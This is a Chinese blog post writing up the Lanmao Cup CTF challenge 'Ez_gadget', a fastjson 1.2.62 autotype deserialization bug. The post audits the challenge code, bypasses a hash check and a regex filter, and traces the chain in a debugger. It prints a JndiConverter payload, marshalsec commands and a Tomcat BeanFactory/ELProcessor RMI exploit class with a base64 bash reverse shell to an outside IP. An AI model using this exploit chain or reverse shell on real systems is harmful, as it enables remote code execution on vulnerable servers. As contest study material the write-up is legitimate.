<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>蓝帽杯-EzGadget | Ameuu</title><meta name="keywords" content="蓝帽杯,web"><meta name="author" content="Ameuu,2421894564@qq.com"><meta name="copyright" content="Ameuu"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="蓝帽杯、fastjson">
<meta property="og:type" content="article">
<meta property="og:title" content="蓝帽杯-EzGadget">
<meta property="og:url" content="http://example.com/2022/07/11/%E8%93%9D%E5%B8%BD%E6%9D%AF-EzGadget/index.html">
<meta property="og:site_name" content="Ameuu">
<meta property="og:description" content="蓝帽杯、fastjson">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/cover.jpg">
<meta property="article:published_time" content="2022-07-11T06:15:30.000Z">
<meta property="article:modified_time" content="2022-07-11T06:37:25.070Z">
<meta property="article:author" content="Ameuu">
<meta property="article:tag" content="蓝帽杯">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/img/cover.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2022/07/11/%E8%93%9D%E5%B8%BD%E6%9D%AF-EzGadget/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '天',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"limitCount":50,"languages":{"author":"作者: Ameuu","link":"链接: ","source":"来源: Ameuu","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '蓝帽杯-EzGadget',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-07-11 14:37:25'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.0.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/NANAKI.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">29</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">29</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">5</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/cover.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Ameuu</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">蓝帽杯-EzGadget</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-07-11T06:15:30.000Z" title="发表于 2022-07-11 14:15:30">2022-07-11</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-07-11T06:37:25.070Z" title="更新于 2022-07-11 14:37:25">2022-07-11</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%8F%82%E5%8A%A0%E7%9A%84%E5%90%84%E7%A7%8D%E6%AF%94%E8%B5%9B/">参加的各种比赛</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="蓝帽杯-EzGadget"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="蓝帽杯-Ez-gadget"><a href="#蓝帽杯-Ez-gadget" class="headerlink" title="[蓝帽杯]Ez_gadget"></a>[蓝帽杯]Ez_gadget</h1><ul>
<li>fastjson</li>
</ul>
<p>赛后复现：</p>
<p>利用题目给的jar包开一个环境</p>
<p><img src="https://img-blog.csdnimg.cn/d2812c6ccb0443539cac5a39f9172e1f.png" alt="Untitled"></p>
<h2 id="审计"><a href="#审计" class="headerlink" title="审计"></a>审计</h2><p>可以首先看一下依赖包里面，可以发现存在fastjson1.2.62依赖和Tomcat依赖，而fastjson1.2.62的漏洞百度一下可以发现payload</p>
<blockquote>
<p>{“@type”:”org.apache.xbean.propertyeditor.JndiConverter”,”AsText”:”rmi://127.0.0.1:1099/exploit”}</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/tr1ple/p/12348886.html">https://www.cnblogs.com/tr1ple/p/12348886.html</a></p>
<p><img src="https://img-blog.csdnimg.cn/31f3451bfff3409fa9b0508edbe39cdb.png" alt="Untitled"></p>
<p>存在一个secretkey，在json路由下可以发现存在JSON反序列化，并且设置了<code>ParserConfig.getGlobalInstance().setAutoTypeSupport(true);</code> ，说明可以利用<code>@type</code> 实现fastjson反序列化漏洞，但是if语句看一下可以发现存在hash碰撞</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">publicclass JSONController &#123;</span><br><span class="line">  <span class="meta">@ResponseBody</span></span><br><span class="line">  <span class="meta">@RequestMapping(&#123;&quot;/&quot;&#125;)</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">()</span> </span>&#123;</span><br><span class="line"><span class="keyword">return</span> <span class="string">&quot;Your key is:&quot;</span> + secret.getKey();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="meta">@ResponseBody</span></span><br><span class="line">  <span class="meta">@RequestMapping(&#123;&quot;/json&quot;&#125;)</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">Unserjson</span><span class="params">(<span class="meta">@RequestParam</span> String str, <span class="meta">@RequestParam</span> String input)</span><span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line"><span class="keyword">if</span> (str !=<span class="keyword">null</span> &amp;&amp;</span><br><span class="line">      Objects.hashCode(str) == secret.getKey().hashCode() &amp;&amp; !secret.getKey().equals(str)) &#123;</span><br><span class="line">      String pattern = <span class="string">&quot;.*rmi.*|.*jndi.*|.*ldap.*|.*\\\\\\\\x.*&quot;</span>;</span><br><span class="line">      Pattern p = Pattern.compile(pattern, <span class="number">2</span>);</span><br><span class="line"><span class="keyword">boolean</span> StrMatch = p.matcher(input).matches();</span><br><span class="line"><span class="keyword">if</span> (StrMatch)</span><br><span class="line"><span class="keyword">return</span> <span class="string">&quot;Hacker get out!!!&quot;</span>;</span><br><span class="line">      ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="keyword">true</span>);</span><br><span class="line">      JSON.parseObject(input);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">return</span> <span class="string">&quot;hello&quot;</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/12925988/how-to-generate-strings-that-share-the-same-hashcode-in-java">https://stackoverflow.com/questions/12925988/how-to-generate-strings-that-share-the-same-hashcode-in-java</a></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">  <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">samehash</span><span class="params">(String s, <span class="keyword">int</span> level)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (s.length() &lt; <span class="number">2</span>)</span><br><span class="line">        <span class="keyword">return</span> s;</span><br><span class="line">    String sub2 = s.substring(<span class="number">0</span>, <span class="number">2</span>);</span><br><span class="line">    <span class="keyword">char</span> c0 = sub2.charAt(<span class="number">0</span>);</span><br><span class="line">    <span class="keyword">char</span> c1 = sub2.charAt(<span class="number">1</span>);</span><br><span class="line">    c0 = (<span class="keyword">char</span>) (c0 + level);</span><br><span class="line">    c1 = (<span class="keyword">char</span>) (c1 - <span class="number">31</span> * level);</span><br><span class="line">    String newsub2 = <span class="keyword">new</span> String(<span class="keyword">new</span> <span class="keyword">char</span>[] &#123; c0, c1 &#125;);</span><br><span class="line">    String re =  newsub2 + s.substring(<span class="number">2</span>);</span><br><span class="line">    <span class="keyword">return</span> re;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>存在正则匹配，从而存在过滤，但是可以利用unicode加密绕过</p>
<p>过滤：<code>String pattern = &quot;.*rmi.*|.*jndi.*|.*ldap.*|.*\\\\\\\\x.*&quot;;</code></p>
<h2 id="踩坑1"><a href="#踩坑1" class="headerlink" title="踩坑1"></a>踩坑1</h2><p>因为<code>ParserConfig.getGlobalInstance().setAutoTypeSupport(true);</code> 打开了autotype，所有存在fastjson1.2.62的RCE，那就直接利用<code>marshalsec</code> 开一个ladp服务，并在vps某个目录下放一个恶意类，用python开服务命令如下：</p>
<p>python：</p>
<blockquote>
<p>python3 -m http.server —bind 0.0.0.0 8888</p>
</blockquote>
<p>marshalsec:</p>
<blockquote>
<p>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ‘<a target="_blank" rel="noopener" href="http://your_ip:8888/#Exploit&#39;">http://your_ip:8888/#Exploit&#39;</a></p>
</blockquote>
<p>payload:</p>
<blockquote>
<p>{“@type”:”org.apache.xbean.propertyeditor.JndiConverter”,”AsText”:”rmi://ip:1099/exploit”}</p>
</blockquote>
<p>但是发现虽然接收到了但是没有转到我们的恶意类那边，没有打开codebase</p>
<p><img src="https://img-blog.csdnimg.cn/fe7609da3b3d4513a90cae2952432937.png" alt="QQ图片20220710193008.png"></p>
<h2 id="踩坑2"><a href="#踩坑2" class="headerlink" title="踩坑2"></a>踩坑2</h2><p>因为org.apache.naming.factory.BeanFactory 存在于Tomcat依赖包中，用的是SUS的exp</p>
<p>打包成jar包之后放到vps上执行</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> other;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.jndi.rmi.registry.ReferenceWrapper;</span><br><span class="line"><span class="keyword">import</span> org.apache.naming.ResourceRef;</span><br><span class="line"><span class="keyword">import</span> javax.naming.StringRefAddr;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Tomc</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        <span class="keyword">int</span> rmi_port = <span class="number">9999</span>;</span><br><span class="line">        System.setProperty(<span class="string">&quot;java.rmi.server.hostname&quot;</span>, <span class="string">&quot;82.156.2.166&quot;</span>);</span><br><span class="line">        System.out.println(System.getProperty(<span class="string">&quot;java.rmi.server.hostname&quot;</span>));</span><br><span class="line"><span class="comment">//        String command =&quot;\\&quot;\\&quot;.getClass().forName(\\&quot;javax.script.ScriptEngineManager\\&quot;).newInstance().getEngineByName(\\&quot;JavaScript\\&quot;).eval(\\&quot;\\&quot;)&quot;;</span></span><br><span class="line">        String cmd = <span class="string">&quot;java.lang.Runtime.getRuntime().exec(\\&quot;</span>bash -c &#123;echo,YmFzaCUyMC1pJTIwJTNFJTI2L2Rldi90Y3AvODIuMTU2LjIuMTY2LzIzMzclMjAwJTNFJTI2MQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;\\<span class="string">&quot;);&quot;</span>;</span><br><span class="line">        String command = <span class="string">&quot;\\&quot;</span>\\<span class="string">&quot;.getClass().forName(\\&quot;</span>javax.script.ScriptEngineManager\\<span class="string">&quot;).newInstance().getEngineByName(\\&quot;</span>JavaScript\\<span class="string">&quot;).eval(\\&quot;</span><span class="string">&quot;+cmd+&quot;</span>\\<span class="string">&quot;)&quot;</span>;</span><br><span class="line">        Registry registry = LocateRegistry.createRegistry(rmi_port);</span><br><span class="line">        ResourceRef ref = <span class="keyword">new</span> ResourceRef(<span class="string">&quot;javax.el.ELProcessor&quot;</span>, <span class="keyword">null</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="keyword">true</span>,<span class="string">&quot;org.apache.naming.factory.BeanFactory&quot;</span>,<span class="keyword">null</span>);</span><br><span class="line">        ref.add(<span class="keyword">new</span> StringRefAddr(<span class="string">&quot;forceString&quot;</span>, <span class="string">&quot;KINGX=eval&quot;</span>));</span><br><span class="line">        ref.add(<span class="keyword">new</span> StringRefAddr(<span class="string">&quot;KINGX&quot;</span>, command));</span><br><span class="line"></span><br><span class="line">        ReferenceWrapper referenceWrapper = <span class="keyword">new</span> ReferenceWrapper(ref);</span><br><span class="line">        registry.bind(<span class="string">&quot;Exploit&quot;</span>, referenceWrapper);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是不知道为什么弹shell没有成功</p>
<h2 id="本地复现"><a href="#本地复现" class="headerlink" title="本地复现"></a>本地复现</h2><p><a target="_blank" rel="noopener" href="https://github.com/kxcode/JNDI-Exploit-Bypass-Demo/">https://github.com/kxcode/JNDI-Exploit-Bypass-Demo/</a></p>
<p>把Tomc类中的payload进行修改</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String cmd = <span class="string">&quot;new java.lang.ProcessBuilder[&#x27;(java.lang.String[])&#x27;]([&#x27;cmd&#x27;,&#x27;/c&#x27;,&#x27;calc&#x27;]).start()&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>执行Tomc类，开启RMI服务</p>
<p>payload:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.parser.ParserConfig;</span><br><span class="line"><span class="keyword">import</span> org.apache.xbean.propertyeditor.JndiConverter;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">TomcatAttack</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> </span>&#123;</span><br><span class="line">        ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="keyword">true</span>);</span><br><span class="line"><span class="comment">//        JndiConverter</span></span><br><span class="line">        String s = <span class="string">&quot;&#123;\\&quot;</span><span class="meta">@type</span>\\<span class="string">&quot;:\\&quot;</span>org.apache.xbean.propertyeditor.JndiConverter\\<span class="string">&quot;,\\&quot;</span>AsText\\<span class="string">&quot;:\\&quot;</span>rmi:<span class="comment">//127.0.0.1:1558/Exploit\\&quot;&#125;&quot;;</span></span><br><span class="line">        JSON.parseObject(s);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>发现虽然报错了但是还是执行了</p>
<p>开服务：</p>
<blockquote>
<p>java -jar .\ezgadget.jar</p>
</blockquote>
<p><img src="https://img-blog.csdnimg.cn/d2812c6ccb0443539cac5a39f9172e1f.png" alt="Untitled"></p>
<p>RMI &amp; Registry</p>
<p><img src="https://img-blog.csdnimg.cn/70e7d8564daf4702bdd0169915631368.png" alt="Untitled"></p>
<p>执行：</p>
<p><img src="https://img-blog.csdnimg.cn/3029cee06c0b4f9f93a4faeba8b3113a.png" alt="Untitled"></p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><h3 id="EL表达式"><a href="#EL表达式" class="headerlink" title="EL表达式"></a>EL表达式</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45890771/article/details/123096972">https://blog.csdn.net/weixin_45890771/article/details/123096972</a></p>
<p>本地开服务</p>
<p>自己复现之后，发现最关键的问题居然是exec里面的命令必须要用单引号包裹（？）为什么呢</p>
<p>跟了一下发现居然只是因为双引号闭合了导致命令出错了，为什么别人可以啊可恶！！！！</p>
<p><img src="https://img-blog.csdnimg.cn/c9671d230dbe4225a075bf6bebb5f14d.png" alt="Untitled"></p>
<p><img src="https://img-blog.csdnimg.cn/2fc8dfdb09cc4f5ca880c68bbe0537ac.png" alt="Untitled"></p>
<p>好吧还是把整个过程走一遍，就当记录学习过程了</p>
<p>直接利用本地的payload打断点开始调试，这里我们反序列化的函数和题目一样利用<code>JSON.parseObject</code></p>
<p>前面和<a target="_blank" rel="noopener" href="https://ameuu.github.io/2022/04/15/Java%E5%88%9D%E6%AD%A5%E5%AD%A6%E4%B9%A0%E2%85%A3/">之前分析</a>过的一样，进入到了<code>DefaultJSONParser#parseObject</code> ，绕过解析空格之类的特殊字符，并获取<code>@type</code></p>
<p>因为开启了autotype，会直接获取typeName并进行实例化</p>
<p><img src="https://img-blog.csdnimg.cn/229945e9cd984cd69e9d0230efa12312.png" alt="Untitled"></p>
<p>并在后面利用对传入的payload进行了反序列化</p>
<p><img src="https://img-blog.csdnimg.cn/b23d1dd903014c829cbf9796bdd7ddd1.png" alt="Untitled"></p>
<p>之后调用到<code>DefaultFieldDeserializer#parseField</code> ，对属性的值进行赋值，从而调用到了<code>DefaultFieldDeserializer#setValue</code> 也就相当于调用了setter将rmi的payload赋值给<code>AsText</code></p>
<p><img src="https://img-blog.csdnimg.cn/b30dac05930a432e97aeffcbf32f4696.png" alt="Untitled"></p>
<p>而<code>AbstractConverter#setAsText</code> 中会调用到<code>toObject</code> ，这应该就是关键点了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">final</span> <span class="keyword">void</span> <span class="title">setAsText</span><span class="params">(String text)</span> </span>&#123;</span><br><span class="line">    Object value = <span class="keyword">this</span>.toObject(text.trim());</span><br><span class="line">    <span class="keyword">super</span>.setValue(value);</span><br></pre></td></tr></table></figure>

<p>继续跟进之后发现，在之后调用到<code>JndiConverter#toObjectImpl</code> 的时候会调用到关键的lookup，而参数又是我们传进入的rmi</p>
<p><img src="https://img-blog.csdnimg.cn/d0ceb3dcc7e74db68c869a1960938c0e.png" alt="Untitled"></p>
<p>进到了exp开启的注册服务，并搜索到绑定了存在任意命令类的<code>Exploit</code></p>
<p><img src="https://img-blog.csdnimg.cn/78bf0023db0e49ccbdf3dcd9d6bfafcb.png" alt="Untitled"></p>
<p>之后通过Reference类从开启的注册服务中获取到了我们存放好的恶意类，并读取了其内容也就是包裹着命令执行的字符串（或许说是EL表达式），之后通过循环判断key，从而获取内容。当type为不可知的时候，就会调用到<code>ELProcessor#eval</code> 函数执行content从而实现了任意代码执行</p>
<p><img src="https://img-blog.csdnimg.cn/4df46415d2bb45c9b5feb33d4cd6c3ce.png" alt="Untitled"></p>
<p><img src="https://img-blog.csdnimg.cn/97414cccb9aa486191e4e93d7c544204.png" alt="Untitled"></p>
<p>而至于为什么赛时没有出结果，是因为payload中一直用到是双引号，但是由于eval中也用了双引号了包裹代码，导致发生了闭合从而不能识别整段代码，当然，我还是不能理解为什么当时的环境就连没有unicode的情况下还是没有任何回显</p>
<p><img src="https://img-blog.csdnimg.cn/c40b47b649b84789aa20897bb118a077.png" alt="Untitled"></p>
<h2 id="小记"><a href="#小记" class="headerlink" title="小记"></a>小记</h2><p>有时候总会过度依赖别人，虽然会自己去验证一些事，但是如果遇到了看起来难以解决的问题的时候就会寄希望于其他人，完全否定了自己的能力……</p>
<p>希望自己能够坚持学习，找到志同道合的web手这种事就随缘吧，现在也挺好的，虽然进度可能比较慢但是至少不会经常在乎别人的想法</p>
<p>并且战队和固定小队里的师傅那么厉害，难免会有点焦虑，也算是一种动力……</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="http://example.com">Ameuu</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2022/07/11/%E8%93%9D%E5%B8%BD%E6%9D%AF-EzGadget/">http://example.com/2022/07/11/%E8%93%9D%E5%B8%BD%E6%9D%AF-EzGadget/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com" target="_blank">Ameuu</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E8%93%9D%E5%B8%BD%E6%9D%AF/">蓝帽杯</a><a class="post-meta__tags" href="/tags/web/">web</a></div><div class="post_share"><div class="social-share" data-image="/img/cover.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/07/11/2022%E7%AC%AC%E5%85%AD%E5%B1%8A%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%88%9D%E8%B5%9B%E9%83%A8%E5%88%86wp/"><img class="prev-cover" src="https://img-blog.csdnimg.cn/361848c3c8cf4fb6af523dfe46d9ed53.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">2022第六届蓝帽杯初赛部分wp</div></div></a></div><div class="next-post pull-right"><a href="/2022/07/02/%E9%9B%86%E8%AE%AD%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95%E2%85%A0/"><img class="next-cover" src="/img/cover1.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">集训学习记录Ⅰ</div></div></a></div></nav><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/NANAKI.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Ameuu</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">29</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">29</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">5</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/ameuu"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%93%9D%E5%B8%BD%E6%9D%AF-Ez-gadget"><span 